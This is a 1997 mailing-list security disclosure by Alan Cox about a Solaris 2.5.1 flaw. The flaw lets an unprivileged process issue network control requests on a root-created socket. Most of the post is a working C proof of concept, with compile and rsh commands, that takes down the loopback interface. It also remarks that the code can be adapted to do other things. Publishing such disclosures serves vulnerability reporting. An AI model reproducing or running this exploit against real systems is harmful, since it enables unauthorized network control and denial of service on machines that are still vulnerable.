Solaris 2.5.1 party piece

Alan Cox (alan@LXORGUK.UKUU.ORG.UK)
Thu, 19 Jun 1997 15:27:39 +0100

Well, CERT have had this for a year, AUSCERT for a couple of weeks and
now it's time bugtraq had it.

cc solarisuck.c -o solarisuck -lsocket
rsh localhost ./solarisuck

solarisuck.c

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sockio.h>
#include <net/if.h>
#include <netinet/in.h>

int main(int argc, char *argv[])
{
    struct ifreq please_break_me;

    /* Ask to change the flags of the loopback interface. */
    strcpy(please_break_me.ifr_name, "lo0");
    please_break_me.ifr_flags = 0;

    /* Under rsh, fd 0 is the connection socket that root's rshd created
       and handed to this unprivileged process. The Solaris kernel checks
       who created the socket, not who is calling, so the interface
       control request is honoured. */
    if (ioctl(0, SIOCSIFFLAGS, &please_break_me) == -1)
        perror("Damn it didnt work. Obviously not Solaris ;)");
    return 0;
}

You can adjust this to do other things. Basically any user can do network control
requests on a root created socket descriptor.

Workarounds:
1. Disable rsh and any non-root-owned inetd tasks - breaks remote tar etc.
2. Run an OS that the vendor doesn't take a year to fix bugs in.

I have the original emails from Sun folks (Casper Dik, Alec Muffett and co)
to prove Sun have sat on this for ages.

Alan